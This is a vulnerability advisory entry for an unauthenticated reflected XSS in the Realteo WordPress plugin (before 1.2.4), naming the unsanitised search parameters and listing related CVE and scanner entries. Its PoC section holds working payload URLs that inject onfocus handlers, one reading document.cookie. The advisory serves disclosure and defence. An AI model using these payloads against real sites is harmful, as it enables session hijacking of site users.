Lucene search
M0zeWPVDB-ID:087B27C4-289E-410F-AF74-828A608A4E1EHistoryMar 31, 2021 - 12:00 a.m.
Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-03-3100:00:00
m0ze
wpscan.com
7
The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.
PoC
https://example.com/properties/?keyword_search=--!>" autofocus onfocus=alert(`m0ze`);//" https://example.com/properties/?keyword_search=--!>" autofocus onfocus=alert(document.cookie);//"&search;_radius=--!>" autofocus onfocus=alert(document.cookie);//"
Related
prion
prion
Cross site scripting
2021-04-22 21:15:00
cve
cve
CVE-2021-24237
2021-04-22 21:15:00
wpexploit
wpexploit
Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)
2021-03-31 00:00:00
nuclei
nuclei
WordPress Realteo <=1.2.3 - Cross-Site Scripting
2021-06-09 11:11:17
Related for WPVDB-ID:087B27C4-289E-410F-AF74-828A608A4E1E